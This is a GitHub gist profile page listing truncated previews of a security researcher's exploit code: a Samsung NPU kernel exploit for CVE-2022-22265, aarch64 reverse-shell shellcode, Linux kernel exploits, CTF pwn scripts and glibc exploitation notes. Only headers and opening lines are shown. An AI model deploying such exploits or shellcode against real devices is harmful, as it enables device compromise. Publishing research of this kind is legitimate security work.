Skip to content

Instantly share code, notes, and snippets.

View soez's full-sized avatar

soez soez

28 followers · 4 following
View GitHub Profile
@soez
soez / exp.c
Last active November 2, 2024 09:10
CVE-2022-22265 Samsung A25 npu driver
/*
*
* Author: @javierprtd
* Date : 01-08-2024
* Kernel: 5.10.177
* Samsung A25 NPU: CVE-2022-22265 (bug patched - reintroduced)
*
*/
// echo 1 > /sys/module/memlogger/holders/npu/drivers/platform:exynos-npu/npu_exynos/npu_err_in_dmesg
@soez
soez / shellcode.s
Created August 1, 2024 08:50
user space aarch64 shellcode reverse shell
.section .text
.global _start
_start:
// prologo
sub sp, sp, #0xc0
stp x29, x30, [sp, #0x60]
stp x28, x27, [sp, #0x70]
stp x26, x25, [sp, #0x80]
stp x24, x23, [sp, #0x90]
@soez
soez / address_functions.c
Created August 1, 2024 06:54
Samsung virt_to_phys - phys_to_virt - virt_to_page - page_to_virt
#define MEMSTART 0x80000000UL
#define VIRTUAL_KERNEL_START 0xffffffc008000000UL
#define LINEAR_MAP_START 0xffffff8000000000UL
bool is_lm_addr(uint64_t kaddr)
{
return (kaddr & (VIRTUAL_KERNEL_START - (0x8 << (6 * 4)))) == LINEAR_MAP_START;
}
uint64_t virt_to_phys(uint64_t kaddr)
@soez
soez / exp.c
Created September 30, 2023 14:24
Bluefrost challenge - EKOPARTY_2022
/*
*
* Author: @javierprtd
* Date : 28-09-2023
* Kernel: 6.2.0
*
*/
#define _GNU_SOURCE
#include <stdio.h>
@soez
soez / exp.c
Created July 2, 2023 21:23
No CVE for this https://lkml.org/lkml/2019/12/5/814 it has never been in the official kernel
/*
*
* Author: @javierprtd
* Date : 22-06-2023
* Kernel: 5.10.77
* Bug : https://lkml.org/lkml/2019/12/5/814
* Review: This bug has never been in the official kernel
* Post : https://soez.github.io/posts/no-cve-for-this.-It-has-never-been-in-the-official-kernel
*
*/
@soez
soez / exploit-CVE-2020-27786.c
Created May 24, 2023 23:33
CVE-2020-27786 exploit
/*
*
* Author: @javierprtd
* Date : 21-05-2023
* Kernel: 4.9.220
*
*/
#include <stdio.h>
#include <stdlib.h>
@soez
soez / robots.py
Created October 1, 2022 21:06
Black Hat MEA CTF
from pwn import *
local = False
binary = ELF("./main", checksec = False)
libc = ELF("./libc-2.27.so", checksec = False)
def menu(n):
io.recvuntil("> ")
io.sendline(str(n))
@soez
soez / aarch64_virt_install.sh
Created September 24, 2022 06:56 — forked from yen3/aarch64_virt_install.sh
aarch64 virt-install commands
#!/bin/bash
rm -rf /home/yen3/ubuntu.qcow2
qemu-img create -f qcow2 /home/yen3/ubuntu.qcow2 10G
virsh undefine ubuntu1604arm64 --nvram
install_from_localtion() {
virt-install -n ubuntu1604arm64 --memory 1024 --arch aarch64 --vcpus 1 \
--disk /home/yen3/ubuntu.qcow2,device=disk,bus=virtio \
@soez
soez / mips64el-debian-qemu-exact-steps.md
Created September 24, 2022 06:48 — forked from bradfa/mips64el-debian-qemu-exact-steps.md
mips64el Debian QEMU install

Installing Debian Stretch mips64el Using QEMU

We're going to emulate the mips64el "malta" machine and install Debian Stretch using QEMU on a amd64 Debian Buster host.

Likely you need your user to be in the "libvirt" group and have installed these packages (or a subset of such):

sudo apt install qemu-system-mips virt-manager libguestfs-tools
@soez
soez / Tip
Last active September 13, 2022 18:35
# Glibc 2.35 Ubuntu 22.04
When exit is called, it passes by here... (Explaining without ASLR)
0x7ffff7daa390 <__run_exit_handlers>: endbr64
0x7ffff7daa394 <__run_exit_handlers+4>: push r15
0x7ffff7daa396 <__run_exit_handlers+6>: push r14
0x7ffff7daa398 <__run_exit_handlers+8>: push r13
0x7ffff7daa39a <__run_exit_handlers+10>: push r12
0x7ffff7daa39c <__run_exit_handlers+12>: mov r12,rsi
0x7ffff7daa39f <__run_exit_handlers+15>: push rbp